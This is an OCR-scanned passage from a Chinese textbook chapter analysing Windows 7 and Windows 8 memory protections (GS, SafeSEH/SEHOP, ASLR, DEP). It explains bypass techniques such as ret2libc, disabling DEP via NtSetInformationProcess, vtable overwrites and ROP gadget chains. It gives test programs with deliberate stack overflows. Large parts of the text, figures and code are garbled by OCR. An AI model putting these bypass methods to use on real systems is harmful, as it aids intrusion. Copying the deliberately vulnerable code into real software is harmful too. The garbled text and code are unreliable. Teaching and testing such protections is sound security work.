LA AN Fk Fe SIE HRS Shelleode 去 执行 ,而 是 去 执行 程 厅 外 部 的 库 中 的 代 人 码 , 这 些 库 中 被 执 
行 的 代码 也 可 以 看 作 是 植 入 的 Shelleode 代码 。 所 以 ,虽然 DEP 技术 禁止 在 堆栈 上 执行 代码 ， 
但 库 中 的 代码 依然 是 可 以 执行 的 ,可 以 利用 这 点 ,组合 库 中 的 一 部 分 代码 来 达到 特定 的 目的 。 

(RF Pil “By passing hardware-enforced DEP” skape (matt miller) Skywing (ken 


第 17 章 ”新 型 操作 系统 内 存 安全 机 制 分 


johnson) (in October 2005), 
(2) 关闭 进程 的 DEP——NtSetInformationProcess,SetProcessDEPPolicy, 
DEP 可 以 设置 不 同 的 模式 ,进程 的 DEP 设置 标志 保存 在 内 核 结 构 KPROCESS 中 ,这 
4~ bk xs oH] LA H A 2 NtQueryInformationProcess 和 NtSetInformationProcess 通过 设置 
ProcessExecuteFlags 类 来 查询 和 修改 。KPROCESS 结构 如 下 


lkd> dt kprocess -r 


nt! KPROCESS 
+ 0x06b Flags : _KEXECUTE OPTIONS 
+ 0x000 ExecuteDisable : Bos 0, 1 Bit 
+ 0x000 ExecuteEnable : Pos 1, 1 Bit 
+ 0x000 DisableThunkEmulation  : Pos 2, 1 Bit 
+ 0x000 Permanent : Pos 3, 1 Bit 


+ 0x000 ExecuteDispatchEnable : Pos 4, 1 Bit 
+ 0x000 ImageDispatchEnable : Pos 5, 1 Bit 
+ 0x000 Spare ; Pos 6, 2 Bits 


当局 用 DEP 时 ,ExecuteDisable 8£ E fv; 当 禁 用 DEP 时 ,ExecuteEnable 被 置 位 。 
Permanent 标志 置 位 时 ,这 些 设置 是 最 终 设置 .不 可 以 被 改变 的 。 绕 过 DEP 保护 的 原 EON 
HH ek 2  NtSetInformationProcess 来 关闭 DEP 保护 ,在 调用 的 时 候 指 定 信 息 类 
ProcessExecuteFlags(0x22) M MEM EXECUTE OPTION ENABLE (0x2) 标 志 , 然 后 返回 到 
shellcode。 为 了 初始 化 NtSetInformationProcess 图 数 调用 ,需要 依 助 于 ret2libe 技术 来 完成 参 
数 的 设置 ,并 且 需 要 对 栈 的 布局 进行 针对 性 的 设计 ,并 把 控制 传 回 到 用 户 控制 的 绥 冲 区 中 。 

(3) 使 Shellcode 所 在 内 存 可 执行 。 

可 以 配合 ret2libc 使 用 VirtualAlloc, VirtualProtect 国 数 ,使 内 存 可 执行 ,或 者 通过 
WriteProcessMemory 将 shellcode 复制 到 . code 段 中 ,从 而 具有 可 执行 的 权限 。 


17.4 Windows 8 传统 内 存 保护 机 制 脆弱 性 分 析 


1. GS 保护 机 制 脆弱 性 分 析 

通过 分 析 ,GS 保护 在 安全 cookie 生成 方面 ,借助 于 Intel 的 Ivy Bridge 架构 提供 的 底层 
随机 数 生 成 需 的 文 持 , 随 机 性 有 所 提高 ,使 security cookie 难以 被 预测 。 但 是 在 检测 方法 
上 ,并 没有 显 考 提升 ,依然 可 以 通过 一 些 漏 洞 利用 技术 组 过 GS 保护 。 

CD JR HI GS 保护 ,需要 开局 GS 编 详 选项。 没有 开局 的 模块 ,函数 中 不 会 加 入 _ 
security_cookie 的 检测 。 因 此 对 于 这 类 程序 或 模块 ,可 以 直接 利用 。 

(2) iw fix SEH AAE st Seat GS 保护 。 异 弟 处 理 哨 数 指 针 在 栈 帆 的 位 置 位 于 返 
回 地 址 之 前 。 硅 栈 溢出 发 生 , 可 以 先 宪 盖 到 异常 处 理 函 数 指 针 。 而 且 , 如 果 在 本 孙 数 返回 之 
本 触发 异 第 ,就 会 下 接 进 入 异常 处 理 函 数 。 因 此 ,在 GS 安全 检查 之 有 前 ,就 可 以 将 程序 EIP 
支持。 达到 绕 过 GS BWR. 

(3) iH EH m Mg PAL ae Reis eT. SEE GS 保护 。 奢 栈 上 存在 一 个 还 有 虚 函 数 的 对 象 ,而 
H. ,该 限 数 中 有 对 虚 函 数 的 调用 操作 。 满 足 这 两 点 ,可 以 通过 覆盖 栈 上 对 象 的 虚 聘 数 表 指 
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针 ,使 其 指 问 一 片 可 控 区 域 。 这 片 可 控 内 存 区 域 中 ,有 伪造 的 困 数 地 址 。 当 程序 调用 虚 果 数 
时 ， 会 从 伪造 的 虚 函 数 表 中 调用 需要 的 虚 函 数 ， 因此 程序 EIP 被 动 持 。 对 于 可 控 内 存 区 域 ， 
可 以 选择 栈 区 或 堆 内 存 区 域 。 栈 溢出 漏洞 可 以 在 栈 上 伪造 虚 图 数 表 、 虚 图 数 指针 。 在 堆 内 
FF XY set Ste PR BAS ,需要 信 助 于 扒 喷 射 技术 ,使 某 地 址 对 应 的 内 存 区 域 有 期 望 的 数据 。 

2. SafeSEH 及 SEHOP 脆弱 性 分 析 

iB. i wt [a] 4¢ Hf RtlDispatchException 图 数 ,可 以 发 现 Windows 8 在 SafeSEH 和 
SEHOP vias 面 没 有 做 明显 的 增强 。 由 此 ,Windows 7 及 之 前 版 本 的 攻击 绕 过 SafesEH 及 
SEHOP 方法 同样 可 以 用 在 Windows 8 上 。 针 对 SafeSEH 和 SEHOP 的 检测 逻辑 ,可 以 总 
结 出 几 点 可 能 的 攻击 方法 。 

CD 者 一 个 进程 中 有 未 局 用 SafeSEH 的 模块 , 则 可 以 通过 该 模块 的 指令 绕 过 。 因 为 对 
于 未 启用 的 模块 ,不 会 对 其 做 函数 指针 匹配 。 

(2) 右 栈 上 存在 一 个 对 象 ,可 以 履 兰 该 对 象 的 虚 困 数 表 指针 。 这 样 做 的 前 提 是 ,不 履 兰 
栈 上 某 些 关 键 数据 , 尽 可 能 在 虚 图 数 调用 之 前 ,不 产生 任何 异 稼 。 尽 管 SafeSEH 和 SEHOP 
对 SEH 提供 了 强大 的 保护 机 制 ,防止 攻击 者 对 异 苗 处 理 限 数 指针 和 SEH 链 指针 改写 。 但 
是 通过 利用 虚 图 数 表 指针 履 关 ,可 以 完全 皆 开 针对 SEH 的 检测 。 

(3) 伪造 SEH 链 , 由 于 SEHOP 会 对 SEH 链 的 有 效 性 做 检查 ,因此 可 以 在 栈 上 可 控 区 
域内 伪造 一 个 SEH 链 , 同时 使 最 后 一 个 SEH 结构 的 异常 处 理子 数 指针 指 问 
FinalExceptionHandler. iX FF 4 Jal HH 5 4$ Xb BE ew RAT S JESUM] SEH 链 的 检测 。 

尽管 提出 了 3 MSc Tr HK. 1A BEM TT IK AB A R Jey BR HE A a 2 AR.) A Ts ER AT 
ASLR zk H. ft £16 OL iil ,或 者 第 二 种 方法 中 摘 述 的 , 栈 上 存在 一 个 虚 图 数 表 指针 等 。 在 实际 
的 漏洞 利用 中 ,还 需要 绪 合 实际 情况 ,综合 做 出 判断 。 

3. ASLR 脐 弱 性 分 析 

前 面 分 析 了 ASLR 机 制 在 Windows 8 环境 下 的 改进 。 增 强 了 ASLR 的 随机 性 ,特别 是 
在 x64 环境 下 ,更 是 极 大 提高 了 随机 箭 。 引 入 了 Force ASLR, 对 未 启用 地 址 随机 化 的 模 


块 ,采取 强制 随机 化 。 这 两 点 改进 ,可 以 有 效 屏 蔽 杀 些 攻击 方法 ,如 利用 进程 中 加 载 的 未 局 


用 ASLR 的 模块 绕 过 通过 穷 举 地 址 绕 过 等 方法 。 但 是 ,保护 还 不 是 全 面 的 ,有 以 下 几 点 。 

(1) 在 Windows 8 32 位 系统 下 ,程序 映像 和 模块 依然 只 随机 化 一 个 字 节 ,这 样 攻击 者 
依然 有 机 可 乘 。 在 某 些 漏洞 利用 条 件 下 ,通过 穷 举 地 址 ,猜测 模块 基 址 依然 有 效 。 

(2) Æ ASLR 保护 层面 ,依然 没有 解决 通过 地 址 泄露 ,计算 模块 首 地 址 ,以 绕 过 地 址 随 
机 化 问题 。 因 为 进程 中 虚 函 数 地 址 等 关键 结构 和 映像 基地 址 偏 移 一 定 是 固定 的 ,所 以 只 要 
可 以 泄露 ,就 一 定 可 以 绕 过 地 址 随机 化 。: 当然 这 个 问题 只 靠 地 址 随机 化 是 无 法 解决 的 ， Ti 
面 需要 防止 地 址 泄露 的 种 种 方法 男 一 方面 ,还 要 对 编译 链接 过 程 中 的 编 详 方法 进行 调整 。 

(3) 经 过 测试 发 现 , 目 前 并 不 是 所 有 的 进程 都 会 被 启用 Force ASLR。 利 用 漏洞 进程 中 
的 hxds. dll 模块 ,构造 ROP $, 同时 绕 过 ASLR 和 DEP。 这 一 测试 实例 也 说 明 ， 
ForceASLR 目前 只 存在 于 微软 产品 中 ,其 他 应 用 软件 可 能 还 尚 需 时 日 。 

4. DEP 脐 弱 性 分 析 

DEP 技术 可 以 有 效 防 止 数 据 区 上 执行 指令 ,提高 了 漏洞 利用 的 成 本 ,使 攻击 者 需要 更 
多 的 时 间 去 绕 过 DEP。 现 今 ,ROP(Return Orainted Program) E 7k EC 25 IV, Jg BW DEP 最 
成 熟 的 方法 。ROP 的 核心 思想 是 ,通过 在 栈 上 布置 某 些 指令 组 合 的 返回 地 址 ,以 达到 执行 代 
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码 的 目的 。 些 指令 需要 以 一 个 ret 指令 结尾 ,这 样 才 能 依次 执行 栈 中 地 址 的 代码 片段 。 
ppp 但 是 MANN 文 些 可 执行 数据 区 的 指令 组 合 ,来 完成 某 一 个 功能 。 

图 17-16 所 示 为 ROP 构成 的 Shellcode 简要 示意 图 。 左 半 部 分 为 程序 的 某 数据 区 ,可 
以 是 栈 区 也 可 以 是 准 区 。 右 侧 虚线 框 内 为 可 执行 代码 区 。 数 据 区 中 ea PERIS 
区 的 地 址 构成 。 这 些 地 址 指 癌 的 代码 片段 都 有 一 个 特点 , 即 都 由 一 个 RETN 结 这 样 可 
以 有 效 收 回 控制 权 , 让 程序 执行 流程 沿 看 数据 区 的 地 址 执行 。 


DATA 


17-16 ROP 原理 











a YE 二 


一 般 情 况 下 ,纯粹 通过 ROP Gadget 来 完成 一 个 正常 Shellcode 的 所 有 功能 会 有 难度 。 
fe LAY ROP 利用 都 会 先 调用 系统 API 来 修改 内 存 属 性 或 分 配 一 段 可 执行 内 存 , 人 然后 青 在 
其 上 执行 任意 代码 。 但 是 在 Windows 8 系统 上 ,会 对 ROP 做 简单 的 检测 , 即 调用 某 些 修改 
ni API 时 ,如 果 当 前 栈 指 针 不 在 当前 程序 栈 空间 范围 , 则 认为 程序 受 攻击 , 抛 出 异 

。 由 于 这 种 检测 只 是 简单 的 检测 某 些 API 调用 时 ,ESP 指针 是 否 存在 于 栈 区 之 内 ,并 没 
从 ROP 根本 特征 出 发 ,因此 简单 的 ROP 变形 即 可 绕 过 该 检测 。 其 脆弱 性 有 以 下 几 总 。 

(1) RE ROP 执行 过 程 无 法 检测 ,还 可 以 继续 利用 该 技术 绕 过 DEP. 

(2) 若 想 通过 堆 上 执行 代码 , 则 需要 通过 革 些 ROP Gadget 将 API 的 参数 布置 在 栈 区 ， 
并 将 ESP 指针 重新 指向 栈 上 。 由 此 可 见 对 于 这 种 检测 ESP 的 方法 ,只 需要 人 简单 的 改动 
ROP 就 可 以 达到 绕 过 效果 ，。 


pop eax; retn 


param -> eax // 一 个 参数 
mov [esi], eax; retn //esi 指向 栈 顶 
dec esi; retn //esi Ef 


dec esi; retn 
dec esi; retn 
dec esi; retn 


上 面 的 指令 片段 ,可 以 完成 将 一 个 参数 写 到 栈 上 。POP EAX 将 一 个 参数 弹 和 信 EAX 
H, ESI 此 时 指 问 栈 项 ,MOYV [ EST]. EAX 将 参数 写 人 栈 项 。 后 面 4 个 DEC ESI, farm te Ii 
为 写 和 人 下 一 个 参数 作 准 备 。 用 这 种 指令 片段 ,不 但 可 以 向 栈 上 写 入 参数 ,还 可 以 写 入 返回 地 
址 等 。 当 参数 和 返回 地 址 都 布置 好 以 后 ,可 以 将 要 调用 的 内 存 分 配 相 关 郴 数 写 人 栈 上 ,然后 
用 XCHG ESI,ESP 指令 修改 当前 ESP. H F RRO HAT, ESP 指针 在 合法 范围 内 ,因此 可 
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以 完全 绕 过 此 类 ROP 检测 。 

Windows 8 之 所 以 没有 从 ROP 链 的 根本 特征 出 发 ,去 检测 当前 进程 是 否 在 执行 一 个 
ROP 链 ,一 个 可 能 的 原因 是 ROP Gadget A SL GK AY TIS Hr Bx. (Ae H Eb BS Pr TERI 
标准 难以 预测 , 硅 要 全 方位 检测 可 能 会 付出 性 能 方面 的 代价 。 因 此 Windows 8 引入 了 这 个 
折 中 的 办 法 ,在 如 今 漏 洞 利 用 多 发 区 堆 内 存 和 ROP 执行 的 关键 环节 上 做 了 改进 。 


17.5 Windows 7 内 存 保护 机 制 测试 案例 


17.5.1 GS 保护 脆弱 性 测试 
通过 覆盖 虚 函 数 指针 突破 GS 保护 ,使 用 以 下 代码 。 


class Foo { 
public: 
void  declspec(noinline) gs3(char* src) 
{ 
char buf[8]; 
strcpy(buf, src); 
bar(); //virtual function call 
} 
virtual void  declspec(noinline) bar(){ } 
h 
int main() 
{ Foo foo; 


foo. gs3( 
"AAAAAAAA" / / buffer 
"AAAA" / [gs cookie 
"AAAA" //return address of gs3 
"AAAA" //argument to gs3 
"BBBB" ) ; //vtable pointer in the foo object 


虚 函 数 指针 在 堆栈 中 的 布局 如 图 17-17 所 示 ,程序 将 要 在 特定 位 置 覆盖 数据 ,该 例 中 设 
=H BBBB. Bil 42424242 来 覆盖 虚 表 指针 。 


esp AAAAAAAA 
ort poor 
espt 18 Return address of main 


esptlic Arguments to main 





图 17-17 He eR FR Et EERE P 
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运行 上 面 代 码 编 境 的 程序 gs3. exe 之 后 ,程序 会 报销 ,因为 EDX 寄存 大 被 修改 为 
42424242 (FE BBBB) ,|[ EDX | 恋 成 了 非法 地 址 ,不 可 读 取 ,导致 程序 错误 如 图 17-18 Bra. 


查看 有 关 计 算 机 的 基本 信息 
Windows 版 本 

Windows 7 BER 

版 要 所 有 © 2009 Microsoft Corporation, mmr ahr, 






| — _ -— 
35 rm d HERE Win te bypassing-browser-memory-protections-codeVbhÜB-s.... — . em 


(Cp = =s} | 












| [R^] 9s3.exe 已 停止 工作 
Windows EPLE ara ee 


关联 机 检查 解决 方 奈 并 关闭 该 程序 
* 关闭 程序 





Sur OWURD FIR OSs: LESI] 
AY , DWORD PTR DS: LED 


ESI 
En 


aaizFFaad 
PEH Lr Y 


ul le 
L4 0D CODD E 16 D 


TD AH DUS So ur 


一 
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二 
一 
— 
= 
= 
— 
= 


S: [Ld242424d2]=??? 
Hs-HBl2FF24, (HSCII 
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E 
3 
E 
3 
L 
E 
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C 


— 
1) 


"MISERE 


图 17-18 GS 机制 测 试 结果 


17.5.2 SafeSEH 和 SEHOP 脆弱 性 测试 
测试 SafeSEH 功能 。 测 试 环境 为 : Windows 7 FEA KR. Microsoft Visual Studio 2008, 
使 用 以 下 代码 。 


H include "stdafx.h" 

4 include < iostream > 

+ include < windows. h> 

using namespace std; 

static unsigned int nStep = 17; 
void Function B() 

{ anb x, y = 0 ; 


. try 
( x25/y; // cause an exception) 
. finally 
{ cout << "Step " << nStep++ << " : Excute Function B's finally" << endl ;] 
} 
void Function A () 
i tryl 
Function B () ; 
} 
. finally 
{ cout << "Step " << nStep++ << ”: Excute Function A's finally" << endl ; 
} 
} 


long MyExcepteFilter () 
{ 
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cout << "Step " << nStep++ << " : Excute main exception filter" << endl ; 
return EXCEPTION EXECUTE HANDLER ; 





} 
int main () 
|. try} 
Function A () ; 
] 
. except ( MyExcepteFilter() ) 
{ 
cout << "Step " << nStep++ << " : Excute main except " << endl ; 
} 
system("pause" ) ; 
return 0 ; 
} 


程序 中 B 函数 中 触发 一 个 异常 ,而 B RZE A 函数 中 调用 的 ,A 函数 又 是 在 main 本 


数 中 调用 的 。 按 照 SEH 链 的 处 理 过 程 , 当 触 发 异常 时 SEH AT or ea 


— except 没有 能 够 人 处理 该 异常 , 则 将 异 Zr IE 
: Excute main exception filter 
: Excute Function B's finally 外 抛 出 ,直到 能 够 处 理 为 止 ， Re E 


- Excute Function fH's finally 


Excute main except WU) f Fr. eS o 执行 : 结果 如 图 17-19 所 示 。 





HH fh Zz IY Exception 一 直 被 抛 到 
main 函数 中 Hy except 捕捉 到 异 第 并 进行 处 


图 17-19 SHE 测试 执行 结果 1 


理 , 然 后 月 底层 调用 执行 _finally 和 main P_ except 的 内 容 。 


如 果 将 上 面 程序 中 的 MyExcepteFilter PRI py, LA F PRA, 


long MyExcepteFilter ( ) 

{ 
cout << "Step " << nStep++ << " : Excute main exception filter" << endl ; 
return EXCEPTION CONTINUE SEARCH; 








ee 而 不 是 处 理 异常 ,那么 该 Exception 将 继续 被 往 上 层 抛 ,结果 main A 
结束 还 没有 找到 异 篆 处 理 , 所 以 程序 运行 朋 泪 ,调试 模式 下 提示 异 稍 。 执 行 结果 如 


m 17-20 所 示 。 


81| using namespace std; 
104) static unsigned inj 
111 | Hicrosoft Visual Studio 
1232 void Function B () 
133] 1 SEHtest4. exe 中 的 0x00411539 处 未 处 理 的 异常 : 0xC0000094: 
141 int x, y = 0 | A Integer division by zero 
154 try d 一 
= x=5/ 
171 1 
183 . finally 
13] { 
203 cout << "S 
211 I 
os | RE D) AR QD) 
241 id Function A ( | 





图 17-20 SHE 测试 执行 结果 2 


291 
第 17 章 新 型 操作 系统 内 存 安 全 机 制 分 团 


17.5.3 ASLR 脆弱 性 测试 


测试 DLL 及 函数 加 载 地 址 ,这 段 程序 的 目的 是 输出 Kernel32. dll 和 ntdll. dll 的 加 载 基 
址 和 LoadLibrary、ZwTerminateProcess 图 数 的 人 口 地 址 ,以 及 应 用 程序 本 有 身 一 个 图 数 
fooC) 的 人 口 地 址 。 编 详 环 境 为 Visual Studio 2008. Visual Studio 2008 中 增加 了 
dynamicbase 的 链接 选项 ,用 以 文 持 程序 的 ASLR。 


+ include < windows. h> 
i include < stdio. h> 
void foo( void) 


{ 


} 


printf ("Address of function foo = % pn", foo); 


int main(int argc, char * argv[ ]) 


{ 


HMODULE hMod = LoadLibrary(L"Kernel32.dl1"); 
HMODULE hModMsvc = LoadLibrary(L"ntdll. dll"); 
void * pvAddress = GetProcAddress(hMod, "LoadLibraryW"); 
printf("Kernel32 loaded at % p\n", hMod); 
printf("Address of LoadLibrary = $% pin", pvAddress) ; 
pvAddress = GetProcAddress(hModMsvc, "ZwTerminateProcess"); 
printf("ntdll.dll loaded at % p\n", hModMsvc) ; 
printf("Address of ZwTerminateProcess function = $ p\n", pvAddress) ; 
foo( ); 
if (hMod) 

FreeLibrary(hMod); 
if(hModMsvc) 

FreeLibrary(hModMsvc); 
return 0; 


} 


如 图 17-21 Prox ,没有 开启 dynamicbase 选项 ,再 次 运行 结果 不 变 。 


Kernel32 loaded at 76FAKHHHH 
Address of LoadLibrary=/76FF28D2 
itdll.dll loaded at 77166606 


1ddress of NtQueryInformationProcess funct ion=?771454FH 
Address of NtCurrentTeb -7FFDFHBH 
ess of function foo-HB84B1BBHH 





图 17-21 没有 开启 dynamicbase 选项 运行 结果 


Ref 发现 即使 没有 使 程序 开局 dynamicbase. KAW dll 还 是 都 默认 开启 ASLR 


的 。 


运行 结果 如 图 17-22 所 示 。 


Kernel32 loaded at 75BCHBBH 
Address of LoadLibrary=75C128 B2 
ntdll.dll loaded at 77?76DHBHHB 


Address of NtQuerylInformationProcess function=/77715496 
Address of NtCurrentIeb =/7FFDFHHH 
Address of function foo=66461066 





图 17-22 没有 开启 dynamicbase, 默 认 开 启 ASLR 运行 结果 
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接 下 来 是 开启 dynamicbase, 运 行 结 果 如 图 17-23 所 示 。 


Kernel32 loaded at 76FhnB8HB8B 
Hddress of LoadLibrary=/6FF28D2 
tdll.d1ll loaded at 77188058808 


Address of HtQuerylnformationProcess function-771454FH 
Address of HtCurrentTeb -7FFDFHBH 
Address of function foo-HHEV1IHHH 





17-23 开局 dynamicbase 选项 运行 结果 


再 次 运行 ,系统 的 —— "mod 加 载 地 址 将 不 


Kernel32 loaded at 76FAKHHH 
Hddress of LoadLibrary=/6FF28D2 
tdll.dll loaded at 77160606 
Hddress of NtQuerylnformationProcess function-771454FH 
Address of NtCurrentlTebh =/7FFDFHHH 
Hddeess of Function foo=HHDE1LHHH 





17-24 开启 dynamicbase 选项 再 次 运行 结果 


重启 系统 之 后 ,系统 DLL 和 程序 加 载 基 址 都 发 生 了 变化 ,结果 如 图 17-25 所 示 。 


Kernel32 loaded at 7SBCHHHKE 
Address of LoadLibrary=75C128B2 
ntdll.dll loaded at 7'76DHBHB8H 


Address of NtQuerylInformationProcess function=7'7715496 
Address of NtCurrentTeb -?FFDFB8HH 
Address of function foo-HHWHFE4di1BBH 





到 17-25 开启 dynamicbase 选项 重启 运行 结果 


所 示 为 不 同 测试 条 件 下 的 测试 结果 。 其 中 ,测试 条 件 如 下 。 

: 不 使 用 dynamicbase 编译 选项 ,重复 运行 编译 后 的 同一 个 可 执行 文件 。 
B: ,使 用 dynamicbase 编 详 选 项 ,重复 运行 编 详 后 的 同一 个 可 执行 文件 。 
C: 多 次 重新 编 详 生成 可 执行 文件 ,并 运行 。 

D: 重新 局 动 操 作 系统 后 运行 。 


表 17-5 Windows 7 下 不 同 测试 条 件 下 地 址 变化 的 测试 结果 







测试 条 件 | ESP address | Main function | Kernel 32 address| Ntdll address | PEB address| TEB address 


B 不 变 不 变 变化 变化 变化 变化 
C 不 变 不 变 不 变 变化 变化 变化 
D 变化 变化 变化 变化 变化 变化 


17.5.4 DEP 脆弱 性 测试 


测试 DEP 机 制 的 有 效 性 ,这 段 程序 把 可 执行 指令 块 分 别 复 制 到 代码 段 、 数 据 段 、 堆 \ 堆 
栈 中 进行 执行 ,检测 是 否 发 生 访问 违规 异常 来 测试 系统 的 DEP 功能 。 
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# include < windows. h> 
+ define WIN32 WINNT 0x0500 
# include < winternl. h> 
# include < string. h> 
# include < malloc. h> 
// Returns the address of an exported function in a DLL 
FARPROC resolve func(char* dll, char* func) 
{ 
HMODULE module; 
FARPROC addr; 
module = LoadLibrary(dll); 
if (module == NULL) { 
printf("Failed to load DLL %s\n", dll); 
exit(1); 
} 
addr = GetProcAddress(module, func) ; 
if (addr == NULL) { 
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printf("Failed to resolve function $ s in DLL $ s\n", func, dll); 


exit(1); 
} 
return addr; 
} 
const DWORD ProcessExecuteFlags = 0x22; 
typedef struct { 
unsigned int ExecuteDisable : 1; 
unsigned int ExecuteEnable : 1; 
unsigned int DisableThunkEmulation : 1; 
unsigned int Permanent : 1; 
unsigned int ExecuteDispatchEnable : 1; 
unsigned int ImageDispatchEnable : 1; 
unsigned int DisableExceptionChainValidation : 1; 
unsigned int Spare : 25; 
} KEXECUTE OPTIONS; 
// Returns the process execution flags 
KEXECUTE OPTIONS get process flags() 
{ 





FARPROC NtQueryInformationProcess; 
NTSTATUS status; 

KEXECUTE OPTIONS flags; 

DWORD len; 


NtQueryInformationProcess - resolve func("ntdll.dll", 


"NtQueryInformationProcess"); 


status = NtQueryInformationProcess(GetCurrentProcess(), 


ProcessExecuteFlags, 
&flags, 
sizeof(flags), 
&len); 

if (status < 0) 1 


printf("NtQueryInformationProcess returned error code 0x $ x\n", status); 


exit(1); 
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} 
if (len != 4) { 
printf ("NtQueryInformationProcess returned unexpected length $ d\n", 
len); 
exit(1); 
} 
return flags; 
} 
void dump process flags(KEXECUTE OPTIONS flags) 
{ 
printf("Process execution flags : 0x $% x\n" 
i ExecuteDisable : $% d\n" 
: ExecuteEnable : % d\n" 
ù DisableThunkEmulation : $% d\n" 
Permanent : % d\n" 
2 ExecuteDispatchEnable : $% d\n" 
: ImageDispatchEnable : % d\n" 
i DisableExceptionChainValidation : % d\n", 
* (DWORD * )&flags, 
flags. ExecuteDisable, 
flags. ExecuteEnable, 
flags. DisableThunkEmulation, 
flags. Permanent, 
flags. ExecuteDispatchEnable, 
flags. ImageDispatchEnable, 
flags. DisableExceptionChainValidation); 





} 
void dep_test(FARPROC addr) 
{ 
. try { 
addr(); 
printf("okWMn"); 
} __except(EXCEPTION EXECUTE HANDLER) { 
printf("access violation\n") ; 


} 

void code_text() { 
return; 

} 

char code data[4096]; 

void main() 

{ 
char code_stack[ 4096]; 
char * code heap = (char * )malloc(4096); 
KEXECUTE OPTIONS flags = get process flags(); 
dump process flags(flags); 
printf("\nRunning tests: Mn"); 
printf(" text : "); 
dep test((FARPROC)code text); 
printt{" data : 295 
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memcpy(code data, code text, 4096); 
dep test((FARPROC)code data); 
printf(" heap : "); 

memcpy(code heap, code text, 4096); 
dep test((FARPROC)code heap); 
printf(" stack : "); 

memcpy(code stack, code text, 4096); 
dep test((FARPROC)code stack); 


首先 ,不 开启 NXcompat 选项 ,生成 可 执行 程序 后 运行 结果 如 图 17-26 所 示 。 


Process execution flags 
ExecuteDisable 
ExecuteEnable - 
DisableThunkEmulation : 
Permanent 


ExecuteDispatchEnable : 
ImageDispatchEnable 


DisableExceptionChainUYalidation : 是 


Running tests: 
text = ok 
data = ok 
heap = ok 
stack : ok 





17-26 不 开局 NXcompat 选项 运行 结果 


接 下 来 是 开局 NXcompat 选项 ,生成 可 执行 程序 后 运行 结果 如 图 17-27 PZR 


Process execution flags 6x 
ExecuteDisable a 
ExecuteEnable : | 
DisableThunkEmulation : Ø 
Permanent z: 6 
ExecuteDispatchEnable : Ø 
ImageDispatchEnable : 6 
DisableExceptionChainValidation : @ 


Running tests: 
text = ok 
data = access violation 
heap = access violation 
stack : access violation 





图 17-27 开启 NXcompat 选项 运行 结 


对 比 上 述 运 行 结 果 可 知 , 便 件 实 施 DEP 可 以 有 效 地 检测 代码 的 运行 位 置 。 当 代码 并 非 
运行 在 代码 段 ,而 是 运行 在 数据 上段、 堆 、 堆 栈 人 处 时 ,将 引发 异 第 。 因 此 ,在 正常 情况 下 ,DEP 
机 制 能 够 帮助 阻止 数据 页 (如 默认 的 推 页、 各 种 堆栈 页 及 内 和 存 池 页 ) 执 行 代 但 ,防止 在 系统 上 
运行 恶意 代码 。 


17.6 Windows 8 内 存 保护 机 制 测试 案例 


对 Windows 8 内 存 保护 机 制 分 析 的 基础 上 ,首先 编写 测试 用 例 以 进一步 验证 其 有 效 


性 ,其 次 对 可 能 的 绕 过 方法 加 以 测试 ,并 分 析 其 可 行 性 和 稳定 性 。 对 每 一 项 内 存 你 护 机 制 ， 
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祁 针 对 性 编写 测试 代码 。 在 测试 过 程 中 或 茶 些 脆弱 性 验证 过 程 中 ,需要 特定 环境 配合 ,如 在 
Zeit DEP 测试 中 ,需要 信 助 于 某 些 地 址 固定 的 组 件 。 为 了 对 内 存 保护 机 制 和 绕 过 方法 有 更 


深入 和 全 面 的 展示 ,在 整个 测试 过 程 中 , 信 助 于 调试 颖 观察 系统 在 某 一 时 刻 的 状态 和 某 些 关 
键 的 运行 流程 。 
本 和 草 的 测试 环境 主要 为 表 17-6 所 示 。 
表 17-6 测试 环境 
机 器 配置 CPU: Intel® CoreIMi7-3770 CPU @ 2. 50GHz ,内存 : 17GB DDR3 
—9 Windows 8 旗舰 版 
出 试 对 象 IE10 浏览 器 


Visual Studio 2012 ,编写 测试 用 例 
WinDbg ,用 于 调试 测试 程序 和 相关 Windows 组 件 
测试 工具 Vmware Workstation 10. 0. 1 ,用 于 被 测 系统 虚拟 机 环境 
Immuni Debugger 及 Ollydbg 用 于 Ring3 级 的 道 向 分 析 与 动态 调试 
IDA Pro 6. 4, 静 态 反 汇 编 道 向 分 析 


C/C++ 用 于 大 部 分 测试 
JavaScript 用 于 编写 部 分 浏览 副 测 试用 例 


17.6.1 GS 保护 脆弱 性 测试 


1. 测试 GS 保护 有 效 性 
在 编译 选项 中 开启 GS 保护 ,测试 代码 如 下 。 
# include < stdio. h> 


# include < Windows. h> 
void gs(char * src) 


{ 
char test[8]; 
strcpy(test, src); 
} 
void main() 
{ 
gs( " AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); 
} 


当 发 生 栈 缓冲 区 溢出 时 ,覆盖 到 _security_cookie, 如 图 17-28 右上 角 的 栈 数 据 被 覆盖 为 
41414141。0x00FE1074 Ab AY ek Zh Fs; DU SIR dui h EL FE crash. 
2. GS 保护 脆弱 性 测试 


Fir Jas 2S HS M PAR. E d LH PRI BE ET. XX TFTE security. cookie 检测 之 前 ,就 可 以 
将 程序 流程 动 持 , 从 而 绕 过 GS 保护 。 测 试 时 开局 GS 选项 ,测试 代码 如 下 。 
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| -OOFESBS6 VIE. 

41414141 AAAA 

| | |OOD3FBEC + 41414141 AAAA 
= - JODSFEFO + 41414141 AAAA 
I |) GStestexe 已 停止 工作 OODSFSF4 41414141 AAAA 
— jFSFS 41414141 AAAA 
Windows BILARSSUEE En EIBIER NES. IOD3FSFC 41414141 AAAA 


41414141 AAAS 
DSF904 41414141] AAAA 
^ 联机 检查 解决 万 案 并 关闭 该 程序 Fans 41414141 ARAR 


SUE 





图 17-28 测试 环境 


# include < string. h> 


char shellcode[ ] ="" / [MessageBox Shellcode 
class GsVirtual { 
public: 
void gstest(char* src) 
{ 


char buf[200]; 
memcpy(buf, src,sizeof(shellcode)); 
vir(); 
} 
virtual void vir(){} 

}; 

int main( ) 

{ GsVirtual test; 

test. gstest(shellcode) ; 


gstest O 函数 存在 缓冲 区 溢出 漏洞 , 当 函 数 gstest 传人 字符 串 长 度 大 于 200 个 字 节 时 ,buf 
数组 会 被 洪 出 。 用 OD 加 载 可 执行 程序 ,观察 虚 函 数 表 指针 在 内 存 中 的 布局 ,如 图 17-29 所 示 。 










41514141 


















41515151 buf 数据 
41515151 | 

3018FF18 || 51515121 

018FF1C || 51515151 
51515151 security cookie 






EBP 
返回 地 址 


"pe 
0018FF^0 ai 
004010C9 - HE BGSuirtual.main*1t 





00515151 
















"RARRARRARAF inaRARRARARARARRARRARRARARRRRRARARRARRARARRRF 
9618FF3C || 80562108 (offset GSuirtual.GSUirtual:: uftable: 
B018FF46 || 0018FF84 
